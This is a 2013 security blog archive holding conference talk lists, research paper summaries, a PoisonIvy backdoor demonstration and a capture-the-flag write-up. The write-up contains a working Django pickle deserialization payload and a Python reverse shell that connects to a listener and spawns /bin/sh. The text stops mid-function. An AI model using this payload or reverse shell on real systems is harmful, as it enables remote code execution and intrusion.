Wednesday, September 11, 2013

BlackHat 2013


[malware]
BINARYPIG - SCALABLE MALWARE ANALYTICS IN HADOOP
BOCHSPWN: IDENTIFYING 0-DAYS VIA SYSTEM-WIDE MEMORY ACCESS PATTERN ANALYSIS
BUGALYZE.COM - DETECTING BUGS USING DECOMPILATION AND DATA FLOW ANALYSIS
END-TO-END ANALYSIS OF A DOMAIN GENERATING ALGORITHM MALWARE FAMILY
HOT KNIVES THROUGH BUTTER: BYPASSING AUTOMATED ANALYSIS SYSTEMS
HOW TO GROW A TREE (TAINT-ENABLED REVERSE ENGINEERING ENVIRONMENT) FROM CBASS (CROSS-PLATFORM BINARY AUTOMATED SYMBOLIC-EXECUTION SYSTEM)
HUNTING THE SHADOWS: IN DEPTH ANALYSIS OF ESCALATED APT ATTACKS
JAVA EVERY-DAYS: EXPLOITING SOFTWARE RUNNING ON 3 BILLION DEVICES
JUST-IN-TIME CODE REUSE: THE MORE THINGS CHANGE, THE MORE THEY STAY THE SAME
MACTANS: INJECTING MALWARE INTO IOS DEVICES VIA MALICIOUS CHARGERS
OPTIROP: HUNTING FOR ROP GADGETS IN STYLE
VIRTUAL DEOBFUSCATOR - A DARPA CYBER FAST TRACK FUNDED EFFORT
SPY-JACKING THE BOOTERS
SMASHING THE FONT SCALER ENGINE IN WINDOWS KERNEL
PRESS ROOT TO CONTINUE: DETECTING OSX AND WINDOWS BOOTKITS WITH RDFU
PREDICTING SUSCEPTIBILITY TO SOCIAL BOTS ON TWITTER
MILLION BROWSER BOTNET

[web]
DISSECTING CSRF ATTACKS & COUNTERMEASURES
THE FACTORING DEAD: PREPARING FOR THE CRYPTOPOCALYPSE
JAVASCRIPT STATIC SECURITY ANALYSIS MADE EASY WITH JSPRIME
') UNION SELECT `THIS_TALK` AS ('NEW OPTIMIZATION AND OBFUSCATION TECHNIQUES’)
TLS 'SECRETS'
SSL, GONE IN 30 SECONDS - A BREACH BEYOND CRIME
PIXEL PERFECT TIMING ATTACKS WITH HTML5


[network]
DEFENDING NETWORKS WITH INCOMPLETE INFORMATION: A MACHINE LEARNING APPROACH
EVADING DEEP INSPECTION FOR FUN AND SHELL
FULLY ARBITRARY 802.3 PACKET INJECTION: MAXIMIZING THE ETHERNET ATTACK SURFACE
HOME INVASION V2.0 - ATTACKING NETWORK-CONTROLLED HARDWARE
OWNING THE ROUTING TABLE - PART II
WHAT'S ON THE WIRE? PHYSICAL LAYER TAPPING WITH PROJECT DAISHO
UNIVERSAL DDOS MITIGATION BYPASS
LESSONS FROM SURVIVING A 300GBPS DENIAL OF SERVICE ATTACK


[social engineering]
USING ONLINE ACTIVITY AS DIGITAL FINGERPRINTS TO CREATE A BETTER SPEAR PHISHER
PREDICTING SUSCEPTIBILITY TO SOCIAL BOTS ON TWITTER
MALTEGO TUNGSTEN AS A COLLABORATIVE ATTACK PLATFORM

[embedded]
BLUETOOTH SMART: THE GOOD, THE BAD, THE UGLY, AND THE FIX!
EXPLOITING NETWORK SURVEILLANCE CAMERAS LIKE A HOLLYWOOD HACKER
FACT AND FICTION: DEFENDING YOUR MEDICAL DEVICES
HACKING, SURVEILLING, AND DECEIVING VICTIMS ON SMART TV
HONEY, I’M HOME!! - HACKING Z-WAVE HOME AUTOMATION SYSTEMS
THE OUTER LIMITS: HACKING THE SAMSUNG SMART TV
OUT OF CONTROL: DEMONSTRATING SCADA DEVICE EXPLOITATION
UART THOU MAD?

TERIDIAN SOC EXPLOITATION: EXPLORATION OF HARVARD ARCHITECTURE SMART GRID SYSTEMS
STEPPING P3WNS: ADVENTURES IN FULL-SPECTRUM EMBEDDED EXPLOITATION (AND DEFENSE!)
THE SCADA THAT DIDN'T CRY WOLF- WHO'S REALLY ATTACKING YOUR ICS DEVICES- PART DEUX!
RFID HACKING: LIVE FREE OR RFID HARD
POWER ANALYSIS ATTACKS FOR CHEAPSKATES

[mobile]
ANDROID: ONE ROOT TO OWN THEM ALL
BLACKBERRYOS 10 FROM A SECURITY PERSPECTIVE
HOW TO BUILD A SPYPHONE
ROOTING SIM CARDS
REVEALING EMBEDDED FINGERPRINTS: DERIVING INTELLIGENCE FROM USB STACK INTERACTIONS
MULTIPLEXED WIRED ATTACK SURFACES
MOBILE ROOTKITS: EXPLOITING AND ROOTKITTING ARM TRUSTZONE
I CAN HEAR YOU NOW: TRAFFIC INTERCEPTION AND REMOTE MOBILE PHONE CLONING WITH A COMPROMISED CDMA FEMTOCELL

[system]
A TALE OF ONE SOFTWARE BYPASS OF WINDOWS 8 SECURE BOOT
BIOS SECURITY
FUNDERBOLT: ADVENTURES IN THUNDERBOLT DMA ATTACKS
HACKING LIKE IN THE MOVIES: VISUALIZING PAGE TABLES FOR LOCAL EXPLOITATION
HIDING @ DEPTH - EXPLORING, SUBVERTING AND BREAKING NAND FLASH MEMORY
LET'S GET PHYSICAL: BREAKING HOME SECURITY SYSTEMS AND BYPASSING BUILDINGS CONTROLS
PASS-THE-HASH 2: THE ADMIN'S REVENGE
PASS THE HASH AND OTHER CREDENTIAL THEFT AND REUSE: MITIGATING THE RISK OF LATERAL MOVEMENT AND PRIVILEGE ESCALATION

[else]
WITH BIGDATA COMES BIG RESPONSIBILITY: PRACTICAL EXPLOITING OF MDX INJECTIONS
WHAT SECURITY RESEARCHERS NEED TO KNOW ABOUT ANTI-HACKING LAW
TOWN HALL MEETING: CFAA REFORM STRATEGY
POST EXPLOITATION OPERATIONS WITH CLOUD SYNCHRONIZATION SERVICES
MAINFRAMES: THE PAST WILL COME BACK TO HAUNT YOU
LEGAL CONSIDERATIONS FOR CELLULAR RESEARCH
LEGAL ASPECTS OF FULL SPECTRUM COMPUTER NETWORK (ACTIVE) DEFENSE
LAWFUL ACCESS PANEL
IS THAT A GOVERNMENT IN YOUR NETWORK OR ARE YOU JUST HAPPY TO SEE ME?

Friday, August 23, 2013

Paper Reading : Enabling Sophisticated Analyses of x86 Binaries with RevGen

This paper was presented at HotDep '11.
It aims to ease binary analysis with RevGen, which translates traditional x86 binaries into LLVM IR instead of the ad-hoc IRs used by the various existing analysis systems.

There are many systems for binary program analysis, for example BitBlaze and CodeSurfer. However, each uses its own IR, which is hard to migrate to other systems and has no formal verification.

LLVM, a popular compiler framework, is widely used in analysis tools; for example, KLEE and Parfait are both LLVM-based.

LLVM

LLVM is a compiler framework with a compact RISC-like instruction set. It supports an unlimited number of registers and has only about 30 opcodes, which eases analysis. In particular, only load and store can access memory.
LLVM natively uses Static Single Assignment (SSA) form, so data-flow and def-use graphs can be computed directly. Moreover, function inlining, constant propagation and dead-store removal are readily available.
To translate binary code into LLVM, the following issues must be addressed:
  • pointer arithmetic
  • accommodating different stack layouts
  • transforming accesses to various code and data segments
  • dealing with indirect calls
  • producing semantically equivalent LLVM programs

Challenge


  1. Extracting the binary code's semantics
  2. Inferring type information

RevGen




Translating Blocks of Binary Code

1. Disassemble into micro-operations, which are translated to LLVM instructions later.
2. Map micro-operations to LLVM instructions one to one.

Reconstructing the Control Flow Graph (CFG)

1. Each code block is translated to an LLVM basic block, and the blocks form functions.
2. Connect the functions with call instructions.

Obtaining Analyzable LLVM Programs

In this step the symbol table, which contains the library calls, and the relocation table are used to identify constant addresses. Then the translation can be completed.
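To make the two translation steps and the CFG reconstruction concrete, here is a toy x86-to-LLVM-IR-style translator. It is an added example written for this note, not RevGen's code, and it covers only a handful of instructions (mov, add, sub, jmp, jnz, ret) on a constructed sample program. Registers are kept in memory slots so that, as in LLVM, only load and store touch machine state, and every temporary is assigned exactly once (SSA).

```python
"""Toy x86-to-LLVM-IR-style translator (constructed illustration, not RevGen).
Step 1+2: each x86 instruction becomes micro-operations, one IR instruction each.
Step 3: the instruction stream is cut at leaders to recover basic blocks (the CFG)."""

REGS = ("eax", "ebx", "ecx", "edx")
TERMINATORS = ("jmp", "jnz", "ret")

# Constructed sample program: eax = 3 + 2 + 1 via a counting loop.
SAMPLE = [
    ("mov", "eax", 0),
    ("mov", "ecx", 3),
    ("loop:",),
    ("add", "eax", "ecx"),
    ("sub", "ecx", 1),
    ("jnz", "loop"),
    ("ret",),
]


class Translator:
    def __init__(self):
        self.ntmp = 0

    def new_tmp(self):
        self.ntmp += 1
        return "%%t%d" % self.ntmp

    def operand(self, src, out):
        """Immediate -> literal; register -> load into a fresh SSA temporary."""
        if isinstance(src, int):
            return str(src)
        t = self.new_tmp()
        out.append("%s = load i32, i32* %%%s" % (t, src))
        return t

    def micro_ops(self, instr):
        """Split one x86 instruction into micro-operations and emit exactly
        one IR instruction per micro-operation."""
        op, out = instr[0], []
        if op == "mov":
            v = self.operand(instr[2], out)
            out.append("store i32 %s, i32* %%%s" % (v, instr[1]))
        elif op in ("add", "sub"):
            a = self.operand(instr[1], out)
            b = self.operand(instr[2], out)
            r = self.new_tmp()
            out.append("%s = %s i32 %s, %s" % (r, op, a, b))
            out.append("store i32 %s, i32* %%%s" % (r, instr[1]))
            z = self.new_tmp()                      # zero flag kept in its own slot
            out.append("%s = icmp eq i32 %s, 0" % (z, r))
            out.append("store i1 %s, i1* %%zf" % z)
        elif op == "jmp":
            out.append("br label %%%s" % instr[1])
        elif op == "jnz":
            z = self.new_tmp()
            out.append("%s = load i1, i1* %%zf" % z)
            out.append("br i1 %s, label %%FALLTHROUGH, label %%%s" % (z, instr[1]))
        elif op == "ret":
            v = self.operand("eax", out)
            out.append("ret i32 %s" % v)
        else:
            raise ValueError("unsupported instruction %r" % (instr,))
        return out


def split_blocks(program):
    """Cut the stream at leaders (labels and the instruction after a
    terminator) to recover basic blocks: list of (name, instructions)."""
    blocks, name, cur, n = [], "start", [], 0
    for instr in program:
        if instr[0].endswith(":"):
            if cur:
                blocks.append((name, cur))
            name, cur = instr[0][:-1], []
            continue
        cur.append(instr)
        if instr[0] in TERMINATORS:
            blocks.append((name, cur))
            n += 1
            name, cur = "bb%d" % n, []
    if cur:
        blocks.append((name, cur))
    return blocks


def translate(program):
    """Emit an LLVM-IR-style function: register slots in the entry block, then
    one labelled block per basic block, connected by explicit branches."""
    tr, blocks = Translator(), split_blocks(program)
    lines = ["define i32 @translated() {", "entry:"]
    lines += ["  %%%s = alloca i32" % r for r in REGS]
    lines.append("  %zf = alloca i1")
    lines.append("  br label %%%s" % blocks[0][0])
    for i, (name, instrs) in enumerate(blocks):
        nxt = blocks[i + 1][0] if i + 1 < len(blocks) else None
        lines.append("%s:" % name)
        for instr in instrs:
            for ir in tr.micro_ops(instr):
                if nxt is not None:
                    ir = ir.replace("%FALLTHROUGH", "%" + nxt)
                lines.append("  " + ir)
        if instrs[-1][0] not in TERMINATORS and nxt is not None:
            lines.append("  br label %%%s" % nxt)   # make fall-through explicit
    lines.append("}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(translate(SAMPLE))
```

Running it prints three blocks (start, loop, bb1); the conditional jump becomes a `br i1` whose fall-through target is the next recovered block, which is exactly the edge a CFG reconstruction has to add that the binary leaves implicit.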

Paper Reading : BotMiner: Clustering Analysis of Network Traffic for Protocol- and Structure-Independent Botnet Detection

BotMiner was presented at USENIX '08 by the College of Computing, Georgia Institute of Technology.
In this paper, the authors aim to detect C&C botnets without a priori knowledge. The key idea is to cluster malicious activities and communication traffic separately and then mine the relation between them. Their system achieves a good detection rate in their evaluation.

Introduction

In this section, the authors introduce the current state of botnets. Their classification is listed below.
IRC botnets, including 
P2P botnets, including Nugache and Storm/Peacomm

Related Work

Most related work is specific to the IRC and HTTP protocols, which are the most widely used by C&C botnets. This paper proposes a system that detects C&C communication over arbitrary protocols.

Definition and Assumption

The authors define a botnet as "A coordinated group of malware instances that are
controlled via C&C channels". That is, a bot unavoidably communicates with other bots or a bot server, and a bot necessarily carries out some malicious activities.

Proposed Scheme

The architecture of BotMiner is shown in the figure.
In order to detect bots in a network, BotMiner follows two observations, "who is talking to whom" and "who is doing what". Therefore the system is divided into a C-plane and an A-plane.
  • The C-plane is responsible for communication.
    The C-plane monitor uses hardware support (Cisco, Juniper) to log network traffic.
  • The A-plane is responsible for activities.
    Snort with the SCADE (Statistical sCan Anomaly Detection Engine) plugin is used to implement the A-plane monitor.
In C-plane clustering, noise connections and whitelisted connections are filtered out first. Then two-level clustering is performed, from coarse-grained to fine-grained. The following aggregate attributes are calculated:
  1. the number of flows per hour (fph)
  2. the number of packets per flow (ppf)
  3. the average number of bytes per packet (bpp)
  4. the average number of bytes per second (bps)
After these features are computed, X-means, a K-means variant, is used to cluster in different feature spaces for the coarse-grained and fine-grained levels. X-means can cluster without a predefined number of clusters: it runs multiple rounds of K-means and picks the number of clusters with the help of the Bayesian Information Criterion. A similar approach is used in A-plane clustering.

Finally, the clusters are cross-checked to find intersections that suggest the existence of a botnet.
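The following is an added example, written for this note rather than taken from BotMiner, that runs the C-plane aggregation, a whitelist filter, the A-plane grouping and the final cross-check over constructed flow and activity records. The four C-plane attributes are the paper's; the X-means clustering is replaced by coarse and fine bucketing of the feature vector, which is only a simple stand-in for the paper's two-level clustering, and the host names, thresholds and bucket widths are all assumptions.

```python
"""BotMiner-style cross-plane correlation over constructed records.
Constructed illustration; not BotMiner's code."""
from collections import defaultdict

HOURS = 2.0                      # length of the constructed capture
WHITELIST = {"update.example"}   # destinations filtered out before clustering

# Constructed flow records: (src, dst, dst_port, packets, bytes, duration_s)
# h1, h2 and h4 beacon to the same server with an identical traffic pattern;
# h3 browses a web site and polls a whitelisted update server.
FLOWS = (
    [("h1", "c2srv", 8080, 4, 400, 1.0)] * 20
    + [("h2", "c2srv", 8080, 4, 400, 1.0)] * 20
    + [("h4", "c2srv", 8080, 4, 400, 1.0)] * 20
    + [("h3", "www.example", 80, 30, 20000, 5.0)] * 5
    + [("h3", "update.example", 443, 4, 400, 1.0)] * 20
)

# Constructed A-plane events from the activity monitor: (host, kind, detail)
ACTIVITIES = [("h1", "scan", 445), ("h2", "scan", 445), ("h5", "scan", 445)]


def c_plane_features(flows, hours, whitelist=WHITELIST):
    """Aggregate flows per (src, dst, port) into fph, ppf, bpp and bps."""
    agg = defaultdict(lambda: [0, 0, 0, 0.0])   # flows, packets, bytes, seconds
    for src, dst, port, pkts, nbytes, secs in flows:
        if dst in whitelist:
            continue
        a = agg[(src, dst, port)]
        a[0] += 1
        a[1] += pkts
        a[2] += nbytes
        a[3] += secs
    feats = {}
    for key, (nflows, pkts, nbytes, secs) in agg.items():
        feats[key] = (nflows / hours, pkts / nflows, nbytes / pkts,
                      nbytes / secs if secs else 0.0)
    return feats


COARSE = (5.0, 5.0, 50.0, 50.0)   # bucket widths for the coarse-grained level
FINE = (1.0, 1.0, 10.0, 10.0)     # bucket widths for the fine-grained level


def bucket(feat, widths):
    return tuple(round(v / w) for v, w in zip(feat, widths))


def c_plane_clusters(feats):
    """Two-level grouping: sources whose pattern falls in the same coarse and
    fine bucket form one communication cluster (stand-in for X-means)."""
    clusters = defaultdict(set)
    for (src, _dst, _port), feat in feats.items():
        clusters[("C", bucket(feat, COARSE), bucket(feat, FINE))].add(src)
    return clusters


def a_plane_clusters(activities):
    """Group hosts by the kind of activity, e.g. scanning the same port."""
    clusters = defaultdict(set)
    for host, kind, detail in activities:
        clusters[("A", kind, detail)].add(host)
    return clusters


def cross_check(c_clusters, a_clusters, min_hosts=2):
    """Hosts sharing both a communication cluster and an activity cluster
    with at least min_hosts members are reported as one botnet group."""
    groups = set()
    for c_hosts in c_clusters.values():
        for a_hosts in a_clusters.values():
            both = c_hosts & a_hosts
            if len(both) >= min_hosts:
                groups.add(frozenset(both))
    return groups


def detect(flows=FLOWS, activities=ACTIVITIES, hours=HOURS, min_hosts=2):
    feats = c_plane_features(flows, hours)
    return cross_check(c_plane_clusters(feats), a_plane_clusters(activities), min_hosts)


if __name__ == "__main__":
    for group in detect():
        print("suspected botnet members:", sorted(group))
```

On the constructed data, h4 shares the communication pattern but shows no malicious activity and h5 scans but has no matching traffic pattern, so only h1 and h2 are reported; that is the point of requiring a hit in both planes rather than in either one.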

Friday, August 16, 2013

HITCON 2013 Session Summary : Advance Malware Evasion And Hiding Techniques

This session is from HITCON 2013, presented by Chong Rong Hwa from FireEye.

Attack Vector

In this session, three types of infection vectors are discussed first:
  1. Physical, e.g. USB
  2. Email
    Compressed, encrypted, or password-protected compressed attachments
  3. Web
    Watering hole attack, in which the attacker compromises a legitimate website to host a malicious page.
    e.g. on May 1, 2013, attackers compromised the US Department of Labor site to host the PoisonIvy backdoor

APT Advanced Malware

This malware does not use advanced techniques; it disguises itself as a normal program or user.

Attackers may use old vulnerabilities but slightly change the exploit code to make analysis harder:
    Add invalid characters to an RTF file to confuse the parser
    Replace part of the shellcode with semantically equivalent instructions

Save only non-malicious code on disk and construct the malicious payload in memory:
    Trojan.APT.BaneChant

Employ commonly used encryption (signature) algorithms with slight changes (e.g. DES, AES)
Use public and legitimate services for malicious behaviour, such as Google Drive and Amazon AWS:
    Trojan.APT.Seinup
Anti-VM:
   Detect human behaviour

APT Attack Source

Attacks do not come from a single source, and the control servers are distributed over the world.
      Asia and Eastern Europe are the two main source regions of APT attacks.
      Most APT tools are made in China, e.g. Gh0stRAT

Thursday, August 15, 2013

HITCON 2013 Overview


Cyber War

  1. People's Republic of Cyber Warfare: Comparing China Iran & Russia Militarization of Cyberspace(駭客人民共和國: 中國伊朗跟俄羅斯網軍的分析與比較)
  2. Global Cyber Espionage and Chinese Hacker Threats, Internet Surveillance and PRISM(全球間諜:互聯網監控全球趨勢 棱鏡門與中國駭客威脅論)
  3. APT1: Technical Backstage(APT1: 反攻網軍後台)
  4. How South Korea Makes White-hat Hackers(南韓如何培養白帽駭客?)
  5. How does Japan deal with Targeted Attack and SCADA Security(目標鎖定攻擊與工控系統安全:日本如何應對兩大趨勢)
Cyber war is the main topic of HITCON 2013, so many sessions about global cyber activity are included.
The first two presentations talk about national cyber-warfare capabilities, including those of China, Iran and Russia, and also mention Chinese hackers and US Internet surveillance.
Next, Paul Rascagneres from malware.lu shares his experience tracking APT1, a group that probably operates from China.
Then the national strategies of Japan and Korea, two countries near Taiwan, are discussed.

APT

  1. APT defense from the view of security architecture(從系統設計建置面談 APT 防禦)
  2. Visual Data Analytics - Graphing your Indicators(APT 特徵的視覺資料分析法)
  3. Digital Eagle Eye System: Use Cyber Intelligence against APT Attacks(數位鷹眼系統: 以網路數位情資對抗 APT 攻擊)
  4. APT Cyber Shuttle: From Automated Analysis to TTP Observation(APT網際飛梭:從自動化分析到拆解 APT 後台駭客活動)
  5. Light & Shadow about Banking $ecurity @Japan(光與影 日本銀行業的資訊安全)
At HITCON 2013, APT is still one of the hottest topics. These sessions discuss management and strategy against APT, and some forensic techniques for facing APT attacks are also proposed.
Note that "APT Cyber Shuttle: From Automated Analysis to TTP Observation", by Xecure-Lab & Academia Sinica, will also be presented at Black Hat US 2013.

Malware

  1. Building new weapons for malware analysts(建立惡意軟體分析的新武器)
  2. Advance Malware Evasion and Hiding Techniques(惡意軟體的進階免殺技巧)
  3. Static Analysis and Dynamic Instrumentation for Intelligent Exploit Analysis(靜態與動態智慧型漏洞文件分析系統)
Malware analysis is a long-discussed problem, and this year also includes several sessions about malware.

Mobile


  1. Escaping Android Dynamic Analysis; Chinese New Year Train Ticket Ordering Day(逃離安卓動態檢測 & 訂票助手一日談)
  2. Dex Education 201: Anti-Emulators(深入Dalvik Dex教學:反制模擬器)
  3. Android Hooking Attack
  4. Review of Security Vulnerabilities on the Android Platform(Android平臺安全性漏洞回顧)
  5. GSM Security Research using Open Soruce Tools(以開源軟體進行GSM安全研究)

With the exponential growth in mobile device usage, sessions about mobile are increasing too. The first two sessions describe how malware evades security analysis mechanisms, and the following two are about techniques employed by malware. In particular, "Review of Security Vulnerabilities on the Android Platform", by 肖梓航 (Claud), which reviews this year's Android vulnerabilities, is worth reading.

Exploit & Vulnerability


  1. Life of Coder: The adventure through the landscape of bugs(程序員的蟲洞漂流)
  2. Analysis on the EPATHOBJ Exploit(請謹慎編碼,哪怕它只是一句錯誤處理— 來自 win32k!EPATHOBJ::pprFlattenRec 漏洞的啟示)
  3. Killing AV in x64(戳戳防毒軟體死穴)
  4. 0-Day Easy Talk - Happy Fuzzing Internet Explorer(0-Day 輕鬆談 - Happy Fuzzing Internet Explorer)
  5. How can i have 100 0day for just 1day(超級祕訣 - 一天擁有 100 個 0day!)
  6. Exploiting JRE (JRE安全机制与漏洞挖掘研究)
Exploits and vulnerabilities are an interesting topic this year, and a 0-day sharing activity is also included in this year's HITCON.
In the first three sessions, the authors analyse some known exploits and share their implementations. In the fourth, the author demonstrates a 0-day he found and shares his experience.
The fifth talk presents an idea for fuzzing numerous applications at once. The last one summarises current Java vulnerabilities and directions for fuzzing the Java platform.

Others


  1. The undisclosed files of incidents by the data scientist(資料科學家未曾公開之資安研究事件簿)
  2. OS X Rootkits Stuff(那些洞,我們一起追的 OS X Rootkits)
  3. Spears and shields on online game(線上遊戲矛盾大對決)
  4. Breaking image CAPTCHA for fun(CAPTCHA 好好玩)
  5. Protocol and physical analysis of EMV POS devices.(EMV晶片卡POS裝置的實體與溝通協定分析)
  6. Browser and Local Zone(瀏覽器和本地域)
The session "The undisclosed files of incidents by the data scientist" covers some research topics of professor 陳昇瑋; social networks and malicious phone calls are both special and interesting topics.
Although web security is widely discussed at Black Hat 2013, there are fewer web security topics at this year's HITCON.

Sunday, August 11, 2013

CVE-2013-1763 : Local Privilege Escalation Vulnerability

This vulnerability was published in February; it lets a normal user gain superuser privileges, and Ubuntu 12.x is vulnerable. So I downloaded the PoC code and tested it. The result was successful.

Formal Verification for Cryptography Protocols

At this year's S&P conference, Microsoft and INRIA presented the paper "Implementing TLS with Verified Cryptographic Security." In it, an F# TLS library is implemented and a series of formal proofs is given. Understanding their work requires some background knowledge, and after some searching, the slides published at ETAPS 12 are the most accessible document. So in this article I will summarise those slides.

Attack Model

The attack model is communication in an insecure network environment, as in the following figure:


  • The attacker can intercept all messages sent on the network
  • He can compute messages
  • He can send messages on the network
The term cryptographic primitives means the basic cryptographic functions that are later used to build security protocols.

Symbolic Model and Computational Model 

                          Symbolic model                          Computational model
Cryptographic primitives  black boxes                             functions on bitstrings
Messages                  terms over cryptographic primitives     bitstrings
Attacker capability       computes with cryptographic primitives  probabilistic polynomial-time Turing machine
Security assumptions      verify what the attacker can do         verify what the attacker cannot do

Verifying Protocols in the Symbolic Model

The basic idea is to compute the attacker's knowledge: exhaust all combinations of cryptographic primitives, then check whether any of them violates the security policy. Those combinations can obviously be infinite, so the problem is undecidable in general, and techniques such as approximation, restriction to a proper subset, or termination conditions are used.
For example, Horn clauses can be used to verify a protocol in the symbolic model. With the notation
                                             attacker(M) means "the attacker may have M"
two kinds of clauses are introduced:
       Construct f(m1, m2, ..., mn):
              attacker(m1) ∧ attacker(m2) ∧ ... ∧ attacker(mn) → attacker(f(m1, m2, ..., mn))
       Destruct g(m1, m2, ..., mn) → m:
              attacker(m1) ∧ attacker(m2) ∧ ... ∧ attacker(mn) → attacker(m)
       Example (symmetric encryption and decryption):
              attacker(m) ∧ attacker(k) → attacker(sencrypt(m, k))
              attacker(sencrypt(m, k)) ∧ attacker(k) → attacker(m)
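As an added illustration (written for this note; it is neither ProVerif nor code from Blanchet's slides), the small checker below encodes the two clauses above plus pairing and answers the query "can the attacker derive the secret?" for a few constructed protocol runs. It also shows the approximation the text mentions: destructor clauses only produce subterms, so they are applied to a fixpoint, while the constructor side (unbounded in general) is applied lazily toward the goal, which keeps the search finite. Term names such as s, k, kab, n1 and n2 are assumptions.

```python
"""Saturation checker for the symbolic model (constructed illustration).
Terms are Python strings (atoms) or tuples ("sencrypt", m, k) / ("pair", a, b)."""


def sencrypt(m, k):
    return ("sencrypt", m, k)


def pair(a, b):
    return ("pair", a, b)


def derivable(known, goal):
    """Constructor clauses, applied lazily toward the goal:
    attacker(m1) ^ ... ^ attacker(mn) -> attacker(f(m1, ..., mn)).
    Recursion only descends into subterms, so it always terminates."""
    if goal in known:
        return True
    return isinstance(goal, tuple) and all(derivable(known, a) for a in goal[1:])


def saturate(initial):
    """Destructor clauses, applied to a fixpoint:
      attacker(pair(a, b))                -> attacker(a), attacker(b)
      attacker(sencrypt(m, k)) ^ attacker(k) -> attacker(m)
    Destructors only yield subterms, so the closure is finite."""
    known = set(initial)
    changed = True
    while changed:
        changed = False
        for t in list(known):
            if not isinstance(t, tuple):
                continue
            if t[0] == "pair":
                new = [x for x in t[1:] if x not in known]
            elif t[0] == "sencrypt" and t[1] not in known and derivable(known, t[2]):
                new = [t[1]]
            else:
                new = []
            if new:
                known.update(new)
                changed = True
    return known


def secret_leaks(observed, secret):
    """Security query: can an attacker who saw every message on the
    network derive the secret?"""
    return derivable(saturate(observed), secret)


# Constructed protocol runs: the set of messages the attacker intercepted.
RUN_SAFE = {sencrypt("s", "kab")}                              # key never sent
RUN_KEY_LEAK = {sencrypt("s", "kab"), "kab"}                   # key sent in clear
RUN_CHAIN = {sencrypt("s", "k"), sencrypt("k", "kab"), "kab"}  # k wrapped under leaked kab
RUN_COMPOSED = {sencrypt("s", pair("n1", "n2")), "n1", "n2"}   # key built from known nonces

if __name__ == "__main__":
    for name, run in [("safe", RUN_SAFE), ("key leak", RUN_KEY_LEAK),
                      ("chain", RUN_CHAIN), ("composed key", RUN_COMPOSED)]:
        print("%-12s secret s leaks: %s" % (name, secret_leaks(run, "s")))
```

RUN_CHAIN needs two passes of the destructor loop (first kab unlocks k, then k unlocks s), and RUN_COMPOSED is only found because the constructor side can rebuild pair(n1, n2) as the decryption key; both are the kind of derivation a hand analysis easily misses.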

Verifying Protocols in the Computational Model

There are three strategies for verifying a protocol in the computational model:
  1. Linking the symbolic and the computational models
    First prove the protocol in the symbolic model and establish computational soundness; then the computational model is secure as well.
  2. Adapting techniques from the symbolic model
    Some symbolic techniques can also be adapted to the computational model.
  3. Direct computational proofs
    Proofs in the computational model are typically proofs by sequences of games.

Reference 

  1. Bruno Blanchet's presentation slides (1)
    http://www.mpi-inf.mpg.de/vtsa11/slides/blanchet/VTSA11intro.pdf
  2. Bruno Blanchet's presentation slides (2)
    http://www.mpi-inf.mpg.de/vtsa11/slides/blanchet/VTSA11proverif.pdf
  3. Bruno Blanchet's presentation slides (3)
    http://cs.ioc.ee/etaps12/invited/blanchet-slides.pdf



Thursday, August 8, 2013

PoisonIvy Remote Administration Tool

In this article, I will talk about PoisonIvy and demonstrate its usage.
PoisonIvy is a remote administration tool that is widely used by hackers as a backdoor.
There is some news about PoisonIvy:

Usage Demonstration

In the PoisonIvy server profile, we can configure the server.

In this tab, the address and password can be set; proxy attributes can also be set here.
The next tab, Install, is used to configure how the backdoor starts up, including autostart and the executable name.

Some advanced attributes such as process injection, persistence and key logging are also available.
After generation, a backdoor executable is produced. Then we create the corresponding client and execute the backdoor on another machine.
After a successful infection, a message is shown and we get some basic information about the victim.

Then we can retrieve some system information about the victim's machine.


Next, we can open a remote shell on the victim.

Moreover, we can also get the victim's remote desktop.



HITCON 2013 Write Up: Pwned 500

In this problem, a Django website was given with its source code available here. Browsing the files in the repo, we find two interesting things in settings.py.
  1. The session engine is "django.contrib.sessions.backends.signed_cookies"
  2. The SECRET_KEY is also provided in the source code.
When signed_cookies is used, every cookie with a sessionid field is treated as serialized data, and pickle is used to deserialize it. The pickle library is unsafe as soon as it is applied to anything but ordinary types, so we can follow the document here and complete the attack. Note that the referenced document also provides reference code that is worth reading.

With the following Python code, we can convert connback.py into pickle format and have it invoked as soon as pickle.loads() is called to deserialize the payload.
import pickle
from base64 import b64encode as b64   # b64() is the shorthand used for base64 encoding

# read the reverse-shell script and embed it, base64-encoded, in an eval() gadget
code = b64(open('connback.py').read())

class ex(object):
    def __reduce__(self):
        # pickle.loads() calls eval() on this string, which decodes and exec()s connback.py
        return ( eval, ('str(eval(compile("%s".decode("base64"),"q","exec"))).strip("None")'%(code),) )
payload = pickle.dumps(ex())

And we can prepare a reverse shell (connback.py) as follows:
import os
import socket
import subprocess

host, port = "LISTENER_HOST", 4444   # placeholder: address of the nc listener

socket.setdefaulttimeout(60)
sok = None
try:
    sok = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    sok.connect((host,port))
    sok.send('!P0Wn! Congratulation !!\n') 
    # redirect stdin/stdout/stderr to the socket, spawn an interactive shell, then restore them
    save = [ os.dup(i) for i in range(0,3) ]
    os.dup2(sok.fileno(),0)
    os.dup2(sok.fileno(),1)
    os.dup2(sok.fileno(),2)
    shell = subprocess.call(["/bin/sh","-i"])
    [ os.dup2(save[i],i) for i in range(0,3)]
    [ os.close(save[i]) for i in range(0,3)]
    os.close(sok.fileno())
except Exception:
    pass

Finally, we start nc for the reverse shell to connect to and execute exploit.py to receive the shell.
bletchley@Viking:~/WorkSpace/2013_Django/pwp-master$ python exploit.py '1%idg#a2%byqh@l1wcv^3kc=e*($0v44(u-c^@bf_lz-@#essk' http://vuln-django.orange.tw
Sending payload, check you listenner
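The defender's view of the same bug, as an added example written for this note (not the challenge's or Django's code): the gadget below calls eval on a harmless constant to stand in for the reverse shell, so that plain pickle.loads visibly executes attacker-chosen code, while a restricted unpickler that allowlists globals refuses it and still loads an ordinary session dict. The allowlist contents are an assumption.

```python
"""Unsafe pickle.loads versus a global-allowlisting unpickler (constructed example)."""
import io
import pickle


class Gadget:
    """Any object's __reduce__ decides what pickle.loads will call."""
    def __reduce__(self):
        return (eval, ("1 + 1",))    # harmless stand-in for an arbitrary call


MALICIOUS = pickle.dumps(Gadget())   # what someone able to sign cookies would send
BENIGN = pickle.dumps({"user_id": 42, "cart": [1, 2, 3]})

# Globals a session is allowed to reference; everything else
# (builtins.eval, os.system, subprocess.Popen, ...) is refused. Assumed list.
ALLOWED = {("builtins", "set"), ("builtins", "frozenset")}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in ALLOWED:
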